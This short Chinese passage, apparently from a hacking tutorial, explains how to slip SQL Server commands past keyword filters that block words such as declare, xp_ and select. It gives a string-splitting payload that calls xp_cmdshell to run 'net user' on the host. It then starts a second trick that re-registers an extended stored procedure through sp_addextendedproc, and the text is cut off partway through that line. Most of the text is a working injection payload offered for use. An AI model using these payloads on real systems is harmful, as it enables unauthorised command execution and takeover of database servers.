declare、xp_、sp_、select、update、insert等关键词被过滤了。幸好单引号没有过滤。 EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''') 当xp_被过滤了,declare也被过滤了。什么鸟关键字都被过滤了。试试下面的办法。 EXEC master.dbo.sp_addextendedproc 'abc','xplog7